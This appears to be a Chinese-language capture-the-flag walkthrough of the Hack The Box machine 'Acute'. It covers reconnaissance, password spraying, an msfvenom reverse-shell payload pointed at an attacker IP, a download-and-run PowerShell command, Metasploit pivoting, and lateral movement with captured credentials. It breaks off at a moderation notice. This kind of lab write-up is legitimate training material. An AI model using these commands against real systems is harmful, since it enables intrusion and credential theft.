nmap -p- --min-rate 10000 -v -sV -sC -A -Pn 10.10.11.145
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: A4AA0018F1C83E9E4C63E9A839C56E5C
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after: 2030-01-04T06:34:58
| MD5: cf3a d387 8ede 75cf 89c1 8806 0b6b c823
|_SHA-1: f954 d677 0cf3 54df 3fa2 ed4f 78c3 1902 c120 a368
|_ssl-date: 2022-12-06T11:52:41+00:00; -4s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
只发现一个443端口开放,证书信息中得到域名atsserver.acute.local,配进host
访问web,wappalyzer显示为wordpress,iis 10.0。存在短文件猜解漏洞
为了解决证书报错
在开头加上
import ssl
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
可惜这三文件最终没猜出来,页面点点点,about里下载到一个New_Starter_CheckList_v7.docx
从文档中搜集到一些信息:
三个链接:
https://atsserver.acute.local/Staff 404
https://atsserver.acute.local/Staff/Induction 404
https://atsserver.acute.local/Acute_Staff_Access 登录页
管理员:Lois
某些员工可能未更改的初始密码: Password1!
exiftool发现该文档创建于Acute-PC01,创建者FCastle,修改者Daniel
exiftool New_Starter_CheckList_v7.docx
除此之外这个网页还有一些用户名信息
Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins
根据已有信息,构造用户名字典
3种格式firstname、lastname、 Lstname第一个字母+firstname
Aileen
Wallace
Aallace
Charlotte
Hall
Chall
Evan
Davies
Edavies
Ieuan
Monks
Imonks
Joshua
Morgan
Jmorgan
Lois
Hopkins
Lhopkins
手动尝试后,Edavies, Password1!登录Acute-PC01成功
尝试上线msf,生成载荷,并开启监听
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=4444 EXITFUNC=thread -f exe -o 1.exe
下载执行
Invoke-WebRequest -Uri http://10.10.14.6:8000/1.exe -OutFile 1.exe
.\1.exe
发现被拦截了
但是也没权限查看tasklist,先收集下信息,再看看要不要尝试免杀
c:\users目录下还有jmorgan,Natasha, administrator.ACUTE
查看盘符发现有个D盘,但是进不去
get-psdrive -psprovider filesystem
发现defender白名单目录
查看网卡信息发现居然还有内网
另一台机器是172.16.22.1
现在可以把马传到c:\utils目录下来运行上线,在启socks隧道
msf添加路由
background
use multi/manage/autoroute
set session 2
exploit
msf启动socks代理
use auxiliary/server/socks_proxy
set srvport 1080
exploit
msf的新功能screenshare可以看到用户的实时界面,还真看到了他输密码的操作
acute\imonks ,密码w3_4R3_th3_f0rce,链接主机atsserver
效仿他的操作,报错了。但是执行单条命令是可以的
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $pass)
#报错
Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
#可以
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type c:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type c:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
在wm.ps1的内容为
Invoke-Command -ScriptBlock { type c:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
发现是使用jmorgan身份登录回acute01
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。